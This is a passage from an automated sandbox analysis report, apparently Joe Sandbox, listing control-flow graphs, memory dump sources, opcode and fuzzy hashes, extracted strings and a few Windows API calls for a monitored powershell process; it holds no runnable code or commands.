                                                                                      control_flow_graph 2679 803cbb8-803cbd3 2680 803cc9a-803ccbf 2679->2680 2681 803cbd9-803cbdd 2679->2681 2683 803ccc6-803cceb 2680->2683 2682 803cbe3-803cbe7 2681->2682 2681->2683 2684 803ccf2-803cd18 2682->2684 2685 803cbed-803cc0e 2682->2685 2683->2684 2707 803cd92-803cd9c 2684->2707 2708 803cd1a-803cd21 2684->2708 2691 803cc20-803cc2b 2685->2691 2692 803cc10-803cc1d 2685->2692 2734 803cc2d call 803cba7 2691->2734 2735 803cc2d call 803cbb8 2691->2735 2692->2691 2698 803cc33-803cc35 2700 803cc37-803cc5b 2698->2700 2701 803cc76-803cc78 2698->2701 2700->2701 2706 803cc5d-803cc6e 2700->2706 2702 803cc90-803cc97 2701->2702 2703 803cc7a-803cc86 2701->2703 2703->2702 2706->2701 2736 803cd9e call 803ce6b 2707->2736 2737 803cd9e call 803ce78 2707->2737 2708->2708 2709 803cd23-803cd79 2708->2709 2718 803cd7b-803cd87 2709->2718 2719 803cdae-803cdc9 2709->2719 2710 803cda4-803cda9 2711 803ce46-803ce62 2710->2711 2718->2707 2723 803cdfb-803ce16 2719->2723 2724 803cdcb-803cdec 2719->2724 2723->2711 2729 803ce18-803ce41 2723->2729 2738 803cdee call 803ce6b 2724->2738 2739 803cdee call 803ce78 2724->2739 2729->2711 2730 803cdf4-803cdf9 2730->2711 2734->2698 2735->2698 2736->2710 2737->2710 2738->2730 2739->2730
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1385256932.0000000008030000.00000040.00000800.00020000.00000000.sdmp, Offset: 08030000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_8030000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (-r$(-r
                                                                                      • API String ID: 0-2592573692
                                                                                      • Opcode ID: 854872abbd594a0595db6fb20e0531b6a25fccfab58cf78062e1d6d10337d75b
                                                                                      • Instruction ID: 50d7a37e2491880b0cdca6d120bdc332f68f2c9dd630850dd7386c5d9a792778
                                                                                      • Opcode Fuzzy Hash: 854872abbd594a0595db6fb20e0531b6a25fccfab58cf78062e1d6d10337d75b
                                                                                      • Instruction Fuzzy Hash: A671B231B00219ABEB149F69D8446BF7BABAFC4310F24812AE915A7380DF35DD01CBA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2785 8036178-8036197 2788 80361a0-80361dc 2785->2788 2789 8036199-803619f 2785->2789 2794 80361e2-80361ea 2788->2794 2795 8036277-80362d3 2788->2795 2796 8036206-8036218 2794->2796 2797 80361ec-8036204 2794->2797 2818 80362d3 call 80362e0 2795->2818 2819 80362d3 call 80362f0 2795->2819 2805 8036266-8036276 2796->2805 2806 803621a-8036264 2796->2806 2797->2796 2797->2805 2806->2805 2815 80362d9-80362dd 2818->2815 2819->2815
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1385256932.0000000008030000.00000040.00000800.00020000.00000000.sdmp, Offset: 08030000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_8030000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4')r$c)r
                                                                                      • API String ID: 0-2401334294
                                                                                      • Opcode ID: 33fedcf6259a3960583cb3686e5a29c6076c97bf50f7f9e3a4ec62bc8926c4ca
                                                                                      • Instruction ID: ba57367294a8dc848172b50b07ca141d7887542584e3f37a538ee27e4d79e708
                                                                                      • Opcode Fuzzy Hash: 33fedcf6259a3960583cb3686e5a29c6076c97bf50f7f9e3a4ec62bc8926c4ca
                                                                                      • Instruction Fuzzy Hash: D841A2313042109FD744AB69E894B7E37EADFC9711F1940BAE10ACB3A1DE65CC0687A5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1383309193.0000000007F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4')r
                                                                                      • API String ID: 0-2571267956
                                                                                      • Opcode ID: 8b7c16fd7c3670fa8711e9411e1a64dfa6ca6dc4709ad30ed66a432e01f5fcc3
                                                                                      • Instruction ID: da5aa9bbe5edcc8efe59fbd05ee91f776d98528b7dfd5751138f965e957f7f61
                                                                                      • Opcode Fuzzy Hash: 8b7c16fd7c3670fa8711e9411e1a64dfa6ca6dc4709ad30ed66a432e01f5fcc3
                                                                                      • Instruction Fuzzy Hash: B64238B4A01215DFDB60CB58C944FA9B7B2EF88304F18C599E9099B795CB72EC81CF91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1390758738.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_8720000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (-r
                                                                                      • API String ID: 0-3859746694
                                                                                      • Opcode ID: 89d1432979b48d5935d7f63506f819a4a53e263cc3732d951a52ebd1c999756f
                                                                                      • Instruction ID: fd4931dee05e2b42378b1c584817cc857148ebb2efe44e8658de9ed8a9b99b46
                                                                                      • Opcode Fuzzy Hash: 89d1432979b48d5935d7f63506f819a4a53e263cc3732d951a52ebd1c999756f
                                                                                      • Instruction Fuzzy Hash: 57E19F35B00214DFDB54DF68D894AAEB7F2FF89311B248569D4169B399DB30EC42CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1381618260.0000000007DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7de0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID: 0-3916222277
                                                                                      • Opcode ID: 3e5b1609360067c1b3f5104ecf2051ee55773d5dd2f833cc213bb7901c04d9e3
                                                                                      • Instruction ID: c0c971381664e25f20b347b593a66aff6f4604f96e688b643cac195d41eb7008
                                                                                      • Opcode Fuzzy Hash: 3e5b1609360067c1b3f5104ecf2051ee55773d5dd2f833cc213bb7901c04d9e3
                                                                                      • Instruction Fuzzy Hash: ECE14D75A00209CFDB14EF68C484A9DB7F6FF89314B1589A9D4469B3A5DB30EC42CF94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNELBASE(00000000), ref: 045755D0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1329153158.0000000004570000.00000040.00000800.00020000.00000000.sdmp, Offset: 04570000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_4570000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
                                                                                      • Opcode ID: 51e72144c832ff7b77576caadabb1a37990a5d2f5f19a396a2cddc1723706108
                                                                                      • Instruction ID: a513e22ad2a861c0b0602b9f0916892a569712208f1499fb4cb89910e0a7cc87
                                                                                      • Opcode Fuzzy Hash: 51e72144c832ff7b77576caadabb1a37990a5d2f5f19a396a2cddc1723706108
                                                                                      • Instruction Fuzzy Hash: F9216AB1C00259AFDB10CF9AE84479EFBF4FF48320F10822AD819A7640D778A900CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNELBASE(00000000), ref: 045755D0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1329153158.0000000004570000.00000040.00000800.00020000.00000000.sdmp, Offset: 04570000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_4570000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
                                                                                      • Opcode ID: 8f201ad2e11d6c0061279e9df5da477fae68094330bc1197f3f6b391c9fb3aa7
                                                                                      • Instruction ID: 792e78a56eb4a6e0aa6391665258fb21db8a821949ebbd7facc90d22673a8958
                                                                                      • Opcode Fuzzy Hash: 8f201ad2e11d6c0061279e9df5da477fae68094330bc1197f3f6b391c9fb3aa7
                                                                                      • Instruction Fuzzy Hash: 742133B1D00659ABDB10CF9AE84479EFBF4FB48320F10812AD819A7740D778AA44CFE5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • SetThreadUILanguage.KERNELBASE ref: 087AC9A2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1393283016.00000000087A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_87a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: LanguageThread
                                                                                      • String ID:
                                                                                      • API String ID: 243849632-0
                                                                                      • Opcode ID: 0574cb4d88e4f052cae5032b7cd9d48bc6cc9f8a5d1df7a6e65750c3ec2503f8
                                                                                      • Instruction ID: 982c13b1f6a4bfd265a557e7ea913e4ea24d99a58423ba5901f46ad921f71da9
                                                                                      • Opcode Fuzzy Hash: 0574cb4d88e4f052cae5032b7cd9d48bc6cc9f8a5d1df7a6e65750c3ec2503f8
                                                                                      • Instruction Fuzzy Hash: 961125B1800648DFDB10DF9AD5847AEBBF8EB98321F20846AD559B7210C778A944CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1385256932.0000000008030000.00000040.00000800.00020000.00000000.sdmp, Offset: 08030000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_8030000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {Sfk^
                                                                                      • API String ID: 0-1585569753
                                                                                      • Opcode ID: 1e1f4f412af7832fde9c06ced8397116af214a897a1eb645138afe890f043a7e
                                                                                      • Instruction ID: b3e99b78dd9b80804ab0464ba297c6f2aa952b522a3679d5e08610470f1dfbeb
                                                                                      • Opcode Fuzzy Hash: 1e1f4f412af7832fde9c06ced8397116af214a897a1eb645138afe890f043a7e
                                                                                      • Instruction Fuzzy Hash: 82C16970A00219CFDB54DFA8C454BAEBBF2EF85315F548569E806AB394DB349C42CB40
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1385256932.0000000008030000.00000040.00000800.00020000.00000000.sdmp, Offset: 08030000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_8030000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LR)r
                                                                                      • API String ID: 0-1710443964
                                                                                      • Opcode ID: e817c05ea7dc048622e1e4c352e331b366590201cdac86144ee4f8e7255a99f7
                                                                                      • Instruction ID: 1e0bc0fb20789c331bf745d342d8392af41dfb90dab3c2afa3df96b6c3506997
                                                                                      • Opcode Fuzzy Hash: e817c05ea7dc048622e1e4c352e331b366590201cdac86144ee4f8e7255a99f7
                                                                                      • Instruction Fuzzy Hash: 68A13434B00214DFDB18EF68D458A6DBBB6FF89312B148569E8569B3A0DB35ED42CB40
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1383309193.0000000007F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tP)r
                                                                                      • API String ID: 0-1407732124
                                                                                      • Opcode ID: fa119273d3a80a9c4fcd67c9040529541b1349389d50d8616aba096a3f5a8f9a
                                                                                      • Instruction ID: cc0aa85183ca95786ba03d184c769ef6dc004de0f549900398c3603cb7f7ca18
                                                                                      • Opcode Fuzzy Hash: fa119273d3a80a9c4fcd67c9040529541b1349389d50d8616aba096a3f5a8f9a
                                                                                      • Instruction Fuzzy Hash: 1451B5B1A00205DFDB24EF1CC548AA9B7E2FF85328F1D8599E815AB355C731ED41CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1385256932.0000000008030000.00000040.00000800.00020000.00000000.sdmp, Offset: 08030000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_8030000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LR)r
                                                                                      • API String ID: 0-1710443964
                                                                                      • Opcode ID: 3cb787b4108168b3b7cc1e5323e143b48bd752b83f94b5656a7ab903936fef19
                                                                                      • Instruction ID: f504aea0c913fcd83ddd5023c3230ab6ff0de7dc64d806a8e1dd90b15e5fa03b
                                                                                      • Opcode Fuzzy Hash: 3cb787b4108168b3b7cc1e5323e143b48bd752b83f94b5656a7ab903936fef19
                                                                                      • Instruction Fuzzy Hash: 42513B31A40218DFEB14DFA8D558BADBBF6BF88346F148469E402E7390DB759D82CB40
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1383309193.0000000007F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4')r
                                                                                      • API String ID: 0-2571267956
                                                                                      • Opcode ID: 4043bd636651fffea9361a202e8b20c7f6023f0ace2277ed9491245e0db8e63a
                                                                                      • Instruction ID: 075f109e69f7a4529f9f1444aba873f29cce4ee14f6aeda373a2e8c811359b58
                                                                                      • Opcode Fuzzy Hash: 4043bd636651fffea9361a202e8b20c7f6023f0ace2277ed9491245e0db8e63a
                                                                                      • Instruction Fuzzy Hash: 5A417CF5E00206DFCB24CF59C648A6AB7B2AF51315F1CC1A5E814DB195E732D980CB9A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1381618260.0000000007DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7de0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: H-r
                                                                                      • API String ID: 0-4009427164
                                                                                      • Opcode ID: e3ef4eb8d7c7bc83db7bf7528d2b3ca0756e85b7854a6ef945be31c54fbb5d2a
                                                                                      • Instruction ID: de28d278e003a3a8148c48bb5ae5b386bff409d184689f5976f3b4aa5857d0f5
                                                                                      • Opcode Fuzzy Hash: e3ef4eb8d7c7bc83db7bf7528d2b3ca0756e85b7854a6ef945be31c54fbb5d2a
                                                                                      • Instruction Fuzzy Hash: CD31C170704301CFDB04EB78E855A6EB7B2FF85200B0549ADD916DB391EB35DD058B99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1385256932.0000000008030000.00000040.00000800.00020000.00000000.sdmp, Offset: 08030000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_8030000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $)r
                                                                                      • API String ID: 0-3998638257
                                                                                      • Opcode ID: 4ab9da37596d138e207263b210d2be803e14aed441bd306270221ff5a9e1d035
                                                                                      • Instruction ID: 75e6699bfca5a68ffcd8d0743e9b50536a0462a0c6ed9049dfcfc1d3680edc14
                                                                                      • Opcode Fuzzy Hash: 4ab9da37596d138e207263b210d2be803e14aed441bd306270221ff5a9e1d035
                                                                                      • Instruction Fuzzy Hash: 44316134A01218DFCB14DFA4D850AEEBBB2FF89301F108169E40267350CB32AC05CFA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1385256932.0000000008030000.00000040.00000800.00020000.00000000.sdmp, Offset: 08030000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_8030000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $)r
                                                                                      • API String ID: 0-3998638257
                                                                                      • Opcode ID: e20227cd423e15e5ae809f740e122c337318906cd59133cb41098fcee52f63b1
                                                                                      • Instruction ID: b484353a48406f749b6636be6d3201516b823d962d56eb3b94b19001d4a27c08
                                                                                      • Opcode Fuzzy Hash: e20227cd423e15e5ae809f740e122c337318906cd59133cb41098fcee52f63b1
                                                                                      • Instruction Fuzzy Hash: 76313975A00218DBDB14DFA8D890ADEBBB2FF89305F148569E40677394CB32AC45CFA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1381618260.0000000007DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7de0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: H-r
                                                                                      • API String ID: 0-4009427164
                                                                                      • Opcode ID: 8cd11f8d908b9a7ca3e187d5c667ef5a5d6111ac1811c577aa4a5c17483935bc
                                                                                      • Instruction ID: 4971321afa6e51f117d020bf6ec9fd3e3cc4b85e8b8bbea7cbddbefe0ac52640
                                                                                      • Opcode Fuzzy Hash: 8cd11f8d908b9a7ca3e187d5c667ef5a5d6111ac1811c577aa4a5c17483935bc
                                                                                      • Instruction Fuzzy Hash: C2119070700602DFCB14EF68E844A6EBBB6FF89700B14056DE916D7390DB36DD058B95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1381618260.0000000007DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7de0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: H-r
                                                                                      • API String ID: 0-4009427164
                                                                                      • Opcode ID: 1d00fbb811f7cfa2b7bf7ed70ebb5c782fc52651314c627b473aa9fed79f6fd3
                                                                                      • Instruction ID: 3933973ef8de2f9cb1e8ae1fb618a2945e1613c9c5f9d4960a6417228e1e3222
                                                                                      • Opcode Fuzzy Hash: 1d00fbb811f7cfa2b7bf7ed70ebb5c782fc52651314c627b473aa9fed79f6fd3
                                                                                      • Instruction Fuzzy Hash: A0118E70B00606CFCB14EF68D84496EB7B6FF89710B00056DE916D7390DB35DC018B94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1390758738.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_8720000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: *
                                                                                      • API String ID: 0-163128923
                                                                                      • Opcode ID: b29e93e4eb669e68d22e7f9ad12dac73ec60bc514498f250f99021b779c19adb
                                                                                      • Instruction ID: 8128069cd89a32d8eb70afaced9916ac989d83a8ab3da8575ef8b6ce43ad3b21
                                                                                      • Opcode Fuzzy Hash: b29e93e4eb669e68d22e7f9ad12dac73ec60bc514498f250f99021b779c19adb
                                                                                      • Instruction Fuzzy Hash: FFF04C316043649FDB15DF6A9C8086BBBE5EEC9262304446FE419CF253DA349C06CB70
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1390758738.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_8720000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: *
                                                                                      • API String ID: 0-163128923
                                                                                      • Opcode ID: c8bea19a1394528887ad1a686c520f13920c9e1c4ad17780ccaf430b5fa44740
                                                                                      • Instruction ID: ab13fefbd504edd86eacb5e425dd5b6801ebcfb90fde4371ce84456a70790085
                                                                                      • Opcode Fuzzy Hash: c8bea19a1394528887ad1a686c520f13920c9e1c4ad17780ccaf430b5fa44740
                                                                                      • Instruction Fuzzy Hash: BBF0E231604328DF9B14DB6AAC8486BBBE9EFC8262304482EE419C7245DA74AC058BB4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1390758738.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_8720000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8dac6534baa1e53d9e062a64e70b649113d93e9f459d6bc883ec5766e876206e
                                                                                      • Instruction ID: f45d001c20cb0c102dbc052b688fac36fc2e57c4a128aba600b995108e1dc7c8
                                                                                      • Opcode Fuzzy Hash: 8dac6534baa1e53d9e062a64e70b649113d93e9f459d6bc883ec5766e876206e
                                                                                      • Instruction Fuzzy Hash: 9C028E30B00214DFDB15DFA8D480BAEB7F2EF85311F14856AD506AB399DB35AC46CBA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1383309193.0000000007F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 79205b676e77abbf2ef2177f7a4082999c4b94948fd1fa2d519f616c7f94a1e0
                                                                                      • Instruction ID: 842f7e8fed8e27641363d54cb6cd52530371eaac476f7acc145e4f080c5166c9
                                                                                      • Opcode Fuzzy Hash: 79205b676e77abbf2ef2177f7a4082999c4b94948fd1fa2d519f616c7f94a1e0
                                                                                      • Instruction Fuzzy Hash: 39F14AB4B10205DFDB14CB58C588EA9BBF2EF89305F28C459E915AB395CB72EC41CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1383309193.0000000007F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7f806dc4cb2478d9450337c196f4421a36d79d903b417e4e50e76f2af08e1161
                                                                                      • Instruction ID: 45b58385006795c6db6296fadf12ad1dbda5e9750fd993f80a78846d45937c3d
                                                                                      • Opcode Fuzzy Hash: 7f806dc4cb2478d9450337c196f4421a36d79d903b417e4e50e76f2af08e1161
                                                                                      • Instruction Fuzzy Hash: FEF128B4E10209DFCB14CB58C588EA9BBF2EF89305F28C559E915AB355CB72EC41CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1390758738.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_8720000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 03c1d00da571b2dfda29ccf4928a1e0e89572931364fcbfe70c617f0308d2ad2
                                                                                      • Instruction ID: 72118f66d4cfc2775552d64c657c53f9c3189d4595880835e834ae556d306415
                                                                                      • Opcode Fuzzy Hash: 03c1d00da571b2dfda29ccf4928a1e0e89572931364fcbfe70c617f0308d2ad2
                                                                                      • Instruction Fuzzy Hash: BDF10970A00228CFDB24DF65C994BADBBF2AF88301F1485ADD50AA7359DB359D81CF61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1390758738.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_8720000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7f77b13816fdacd41742b387c664b5b2fc09226763404206e195cbe343e65865
                                                                                      • Instruction ID: 921844c1a881719f0086c8106ed4618593f995303e629a3717a6307781eff90b
                                                                                      • Opcode Fuzzy Hash: 7f77b13816fdacd41742b387c664b5b2fc09226763404206e195cbe343e65865
                                                                                      • Instruction Fuzzy Hash: D1F10874A01218DFDB14DFA8C594AADBBF2EF88305F158169E805AB366DB34ED42CF50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1381618260.0000000007DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7de0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 670d072b9b001bf852ea74827332277443df2a764100ff88e804100701fd71cb
                                                                                      • Instruction ID: 79b73d13b7c2173c05d4c65ebebc788ffb5265bb595dd530a3aaf8f09db02cd0
                                                                                      • Opcode Fuzzy Hash: 670d072b9b001bf852ea74827332277443df2a764100ff88e804100701fd71cb
                                                                                      • Instruction Fuzzy Hash: 50B13271A04305DFDB15EF68D854AAEBBA6EFC5300F0489AED44A8B390DB35DC06CB94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1390758738.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_8720000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ddea0ad9d9bdd1892d8faeffdeb3a98cfaea56ede10d08576a62e1802744d792
                                                                                      • Instruction ID: 33d60db8ea11a8841e2dc274bb1a2ccff9233bdecd475e6e9db88581e43f7159
                                                                                      • Opcode Fuzzy Hash: ddea0ad9d9bdd1892d8faeffdeb3a98cfaea56ede10d08576a62e1802744d792
                                                                                      • Instruction Fuzzy Hash: CAB18F34B00214DFDB14DB69D894AAEBBF6EF88311F258469E406DB395DB35DC42CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1381618260.0000000007DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7de0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 79844fd797733a0ed750a42e5da7d2d0c5b030051e1e314afa430658fd5160c9
                                                                                      • Instruction ID: 5b2af57c1d7717322d76e07c69386ab40e019e779eba9cea6f4c30fc8e205389
                                                                                      • Opcode Fuzzy Hash: 79844fd797733a0ed750a42e5da7d2d0c5b030051e1e314afa430658fd5160c9
                                                                                      • Instruction Fuzzy Hash: FDA16F38341340DFE7159B31EC56B2A3BA3EBC9710F248569EA028F3D5DE76A8479B44
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1381618260.0000000007DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
